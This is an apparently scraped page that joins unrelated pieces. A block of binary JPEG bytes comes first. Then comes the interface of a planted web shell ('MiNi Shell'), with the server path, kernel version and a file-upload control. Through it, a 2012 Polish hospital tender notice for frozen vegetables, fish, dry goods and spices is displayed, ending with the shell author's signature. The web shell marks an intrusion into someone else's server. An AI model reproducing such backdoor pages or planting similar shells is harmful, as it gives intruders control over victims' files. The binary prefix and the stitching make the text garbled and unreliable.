JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121116/454424-N-2012.html

<p class="kh_header"><b>Piekary Śląskie: Dostawa  artykułów spożywczych typu ryby,  mrożonki, artykuły sypkie, przyprawy i inne</b><br>
<b>Numer ogłoszenia: 454424 - 2012; data zamieszczenia: 16.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Piekarskie Centrum Medyczne Sp. z o.o. , ul. Szpitalna 11, 41-940 Piekary Śląskie, woj. śląskie, tel. 32 39 38 100, faks 32 39 38 127.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej Sp. z.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  artykułów spożywczych typu ryby,  mrożonki, artykuły sypkie, przyprawy i inne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sukcesywna dostawa  artykułów spożywczych typu mrożonki, ryby,  artykuły sypkie, przyprawy i inne  dla Piekarskiego Centrum Medycznego  Sp. z o. o. oraz transport i  rozładunek w Kuchni  Szpitala Miejskiego w Piekarach Śląskich pw. Św. Łukasza, mieszczącej się  przy ul. Szpitalna 11.
2.Szczegółowy wykaz asortymentowy i ilościowy artykułów spożywczych  z podziałem na pakiety  zawierają formularze cenowe stanowiące   Załączniki nr 4 a, b, c do SIWZ.
3.Oferowane do przetargu artykuły winny odpowiadać wszelkim wymaganiom postawionym przez Zamawiającego oraz  obowiązującym aktualnie przepisom i normom dotyczącym żywności..
4.Podane  ilości artykułów należy traktować jako orientacyjne, przyjęte na potrzeby przeprowadzenia procedury. Ilości te mogą w trakcie realizacji umowy ulec zmianie. Ilości zamawianych artykułów zawsze będą uzależnione od ilości pacjentów i rzeczywistych potrzeb Zamawiającego. 
5.Wykonawcy nie przysługują roszczenia z tytułu zamówienia przez Zamawiającego mniejszej niż określona w  specyfikacji ilości artykułów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.60.00.00-4, 15.40.00.00-2, 15.80.00.00-6, 15.33.00.00-0, 15.87.00.00-7, 15.82.11.50-5, 15.24.00.00-2, 15.33.11.70-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wypełnione i podpisane oświadczenie o spełnieniu przez oferowane wyroby obowiązujących norm i przepisów ( Załącznika nr 3  do specyfikacji ).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe wymagane dokumenty:
a) wypełnioną i podpisaną ofertę na formularzu Oferta  ( Załącznik nr 1 do specyfikacji), 
b)pełnomocnictwo do reprezentowania Wykonawcy, jeżeli ofertę podpisuje osoba nie       wymieniona w dokumencie określającym status prawny wykonawcy,
c) wypełniony i podpisany  formularz cenowy ( Załącznik Nr  4 ) .Wykonawcy składają       formularze cenowe odrębnie dla każdego pakietu, do którego przystępują.  W ramach pakietu muszą być wycenione  wszystkie wskazane pozycje. 
d) zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli dotyczy danego wykonawcy w celu zweryfikowania czy oferta podpisana jest przez osobę uprawniona do reprezentowania Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W trakcie obowiązywania umowy strony dopuszczają zmiany cen w przypadku zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
2.Strony dopuszczają możliwość zmiany ceny na korzystniejszą dla Zamawiającego ( np. w ramach tzw. promocji okresowych ) w trakcie trwania umowy , bez konieczności starań ze strony Zamawiającego i aneksowania umowy.  
3.Zmiany cen, o których mowa w pkt 1 i 2 nie wymagają konieczności aneksowania umowy.
4.Zamawiający dopuszcza możliwość wzrostu ceny jednostkowej  po uprzednim przedłożeniu przez Wykonawcę stosownej kalkulacji zawierającej uzasadnienie nowej ceny i akceptacji nowej ceny przez Zamawiającego.
5.Zmiana ceny, o której mowa w ust. 5 może być dokonana najwcześniej po upływie 12 m-cy od daty  zawarcia umowy i nie może być dokonywana częściej niż jeden raz na rok  a zwyżka ceny w skali roku nie może przekroczyć 5 % ceny jednostkowej netto określonej w   formularzu cenowym oferty. 
6.Strony dopuszczaja zmianę umowy w zakresie zmiany  osób upoważnionych do kontaktowania się w sprawie umowy w przypadku rozwiązania umowy o pracę z tymi osobami, lub innych zmian organizacyjnych w strukturze kadrowej Zamawiającego lub Wykonawcy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.pkiekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 41-940 Piekary Śląskie, ul. Szpitalna 11. Specyfikacja w wersji papierowej udostępniana odpłatnie na wniosek Wykonawcy. Cena 20 PLN za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2012 godzina 10:00, miejsce: Sekretariat Zamawiającego pod adresem 41-940 Piekary Śląskie, ul. Szpitalna 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamowienia są mrozone warzywa tj;
SZPINAK (pakowany max po 2,5 kg     )	kg	350; KALAFIOR    (pakowany max po 2 kg     )	kg	120; FASOLKA  SZPARAGOWA    (pakowany max po 2 kg     )	kg	120 ; BROKUŁ   (pakowany max po  2 kg     )	kg	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia sąryby tj;
DORSZ MROŻONY - filet  czerniak ( pakowane max  po 6 lub 9 kg)	kg	800 ;
ŚLEDZIE typu matijas marynowane ( pakowane max po 1do 3 kg) 	kg	150 ;
MINTAJ MROŻONY - filet ( pakowane max 6 kg)	kg	200 ;
ŚLEDZIE typu matijas solony ( pakowane max po 1do 3 kg) 	kg	100;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 Artykuły spożywcze typu sypkie, przyprawy i inne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są artykuły spożywcze typu sypkie, przyprawy i inne tj :
Art. sypkie		
CUKIER (op. 1 kg)	kg	500
HERBATA (op. 0,10 kg)	kg	85
KASZA JĘCZMIENNA  (op. 1 kg)	kg	850
KASZA MANNA  (op. 1 kg)	kg	500
KAWA ZBOŻOWA  (op. 0,5 kg)	kg	450
KISIEL  (op.  0,04 kg)	szt	850
GALARETKA  (0,09 kg)	szt	830
MAKARON gruby (op. 0,5 kg)	kg	700
MAKARON nitki (op. 0,5 kg lub 0.25 kg)	kg	500
MĄKA PSZENNA  (op.1 kg typ500)	kg	1500
MĄKA ZIEMNIACZANA (op. 1 kg)	kg	350
MĄKA ŻUREK (op. 1 kg)	kg	60
PŁATKI OWSIANE  (op 0.5 kg)	kg	250
RYŻ  (op. 1 kg)	kg	850
SÓL  (op. 1 kg)	kg	800
Budyń ( op. 0,04 kg)	szt	800
Makaron spagetti ( op 0,5 kg)	kg	600
Sucharki cukrowe (op 0,29 kg)	kg	120
Przyprawy		
ZIELE ANGIELSKIE (0,015 kg)	kg	5
PRZYPRAWA DO KURCZAKA (0,02 kg)	szt	150
PRZYPRAWA typu  JARZYNKA  (1 kg)	kg	500
PIEPRZ ZIOŁOWY (0,02 kg)	kg	18
PIEPRZ CZARNY mielony(0,02 kg)	kg	18
PAPRYKA SŁODKA(0,02 kg)	szt	550
MAJERANEK (0,01 kg)	szt	550
PRZYPRAWA typu MAGII (1 litr)	litry	600
LIŚCIE LAUROWE (0,01 kg)	szt	280
CYNAMON (0,02 kg)	szt	100
KMINEK  (0,02 kg)	szt	250
Art. inne		
DŻEM (0,4 kg)	szt	900
FASOLA KONSERWOWA (0,4 kg)	szt	200
GROSZEK KONSERWOWY (0,4 kg) 	szt	300
KOMPOT (1 litr)	szt	1100
KONCENTRAT POMIDOROWY (0,2 kg)	kg	300
MAJONEZ (0,4 kg)	szt	550
MUSZTARDA (0,2 kg)	szt	180
OCET (0,5 litra)	litry	150
OGÓRKI KONSERWOWE (1 litr)	szt	350
OLEJ (1 litr)	l	450
POMIDORY KONSERWOWE (0,4 kg)	szt	350
KONSERWY ŚLEDZIOWE (0,2 kg)	szt	150
KUKURYDZ KONSREWOWA ( 0,4 kg)	szt	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.40.00.00-2, 15.80.00.00-6, 15.33.00.00-0, 15.87.00.00-7, 15.82.11.50-5, 15.24.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com